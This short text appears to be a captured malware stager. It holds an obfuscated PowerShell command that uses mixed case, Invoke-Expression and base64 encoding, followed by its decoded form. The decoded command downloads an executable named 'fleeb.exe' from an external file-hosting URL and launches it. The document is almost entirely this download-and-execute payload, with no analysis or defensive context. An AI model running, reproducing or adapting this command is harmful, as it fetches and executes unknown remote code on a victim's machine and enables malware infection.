iex([SysTeM.TExT.enCOdInG]::UTf8.gEtstRING([SySTem.cONverT]::frOmbAse64StRInG('CihOZXctT2JqZWN0IHNZU3RFbS5uZVQuV2VCQ2xpZW5UKS5Eb3dOTE9BRGZpbEUoJ2h0dHBzOi8vbWVnYWRsLmZyLz9iNXI1YnN0cWQxJywnZmxlZWIuZXhlJyk7U3RhcnQtUHJvY2VzcyAnZmxlZWIuZXhlJwoK')));exit

##### B64 CONTENT #####


(New-Object sYStEm.neT.WeBClienT).DowNLOADfilE('https://megadl.fr/?b5r5bstqd1','fleeb.exe');Start-Process 'fleeb.exe'

